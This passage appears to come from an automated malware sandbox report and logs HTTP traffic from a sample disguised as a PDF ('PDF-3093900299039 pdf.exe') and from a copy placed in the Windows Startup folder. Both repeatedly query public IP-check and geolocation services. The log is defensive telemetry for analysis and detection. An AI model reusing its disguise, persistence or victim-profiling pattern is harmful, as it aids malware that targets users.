                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Jan 13, 2025 12:08:22.138021946 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:22 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.2.449749132.226.8.169807088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:20.025558949 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:20.847276926 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:20 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              8192.168.2.449753132.226.8.169807088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:21.457597017 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:22.277165890 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:22 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              9192.168.2.449759132.226.8.169807556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:22.871928930 CET127OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Jan 13, 2025 12:08:23.713212013 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:23 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              10192.168.2.449764132.226.8.169807556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:24.373344898 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:25.299108028 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:25 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              11192.168.2.449766132.226.8.169807556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:25.935116053 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:26.773801088 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:26 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              12192.168.2.449768132.226.8.169807556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:27.392987013 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:28.213763952 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:28 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              13192.168.2.449770132.226.8.169807556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:28.963989973 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:30.773112059 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:30 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              14192.168.2.449772132.226.8.169807556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:31.669025898 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:32.504878998 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:32 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              15192.168.2.449775132.226.8.169807556C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 13, 2025 12:08:33.124239922 CET151OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Jan 13, 2025 12:08:33.987791061 CET273INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:33 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.449734104.21.32.14437088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:10 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:10 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:10 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081279
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjWRVqd%2BUiy1cZPuvD813nyZyKYhwpE1xFnIh5d5Z0mPLCZtNv9y3pJMUj%2BpjGQndQRPbIvvPJoy8V4TbaFABu%2BVB6G4Z888Yyr2SiaXkvlj%2B5go%2FBc4K0o2xhZ188foFcl6Lsi7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014ed45b9cb72b9-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1815&rtt_var=697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1553191&cwnd=217&unsent_bytes=0&cid=1a3bafece83c6929&ts=200&x=0"
                                                                                                                                                                              2025-01-13 11:08:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.449735104.21.32.14437088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:11 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              2025-01-13 11:08:11 UTC863INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:11 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081280
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3HOb2h9Mz8Kcm6ozZBOf%2F695M6DTZ%2BXhAT3gQq409EuPGv%2FyJmi1JRWQ5AlJRJKnzxjAYc56GE9FCbWJ83owuT6CdbVIwIpD879qyaswm%2BNvPhp0%2Fu%2BeI2jUnZKgExxP4k6v%2F4xc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014ed4b7ee641a6-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1506&rtt_var=589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1820448&cwnd=241&unsent_bytes=0&cid=15c783ec4d32ae66&ts=136&x=0"
                                                                                                                                                                              2025-01-13 11:08:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.449738104.21.32.14437088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:12 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              2025-01-13 11:08:12 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:12 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081282
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r9THKfabwVsHqX8%2BpOZGM4BXZDOW16LlL7PSVEthjUgTYfm9h%2FdEmiy9ibvvhFO%2F2FPYCaeuCMmRQsi0SvQOma4FYc6XmivfVq6v%2FqhB7gzV12TR9dLPNZQxQt%2BKkzuE9r%2BXjsx0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014ed54aca34344-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1680&rtt_var=651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1653454&cwnd=47&unsent_bytes=0&cid=fc13b48f7e5282e8&ts=154&x=0"
                                                                                                                                                                              2025-01-13 11:08:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.449741104.21.32.14437088C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-13 11:08:15 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2025-01-13 11:08:15 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 13 Jan 2025 11:08:15 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Age: 2081284
                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fgkYIOM%2FdqwY9IfqBRVnUSyqOxE31fbbo%2FH9HLgKHk5BZ7KyFyZQRuj8S0HskQjs3Mbc%2F03jtcWwjNUk3TYN1Yyk6S4oeZ92Gmv2OwgqEHOyEC8gEUEy0qUDXYek0zXsTD8o08qx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9014ed641a5d1875-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1589&rtt_var=613&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1760096&cwnd=153&unsent_bytes=0&cid=06dc5aff1d1e2e1f&ts=158&x=0"
                                                                                                                                                                              2025-01-13 11:08:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


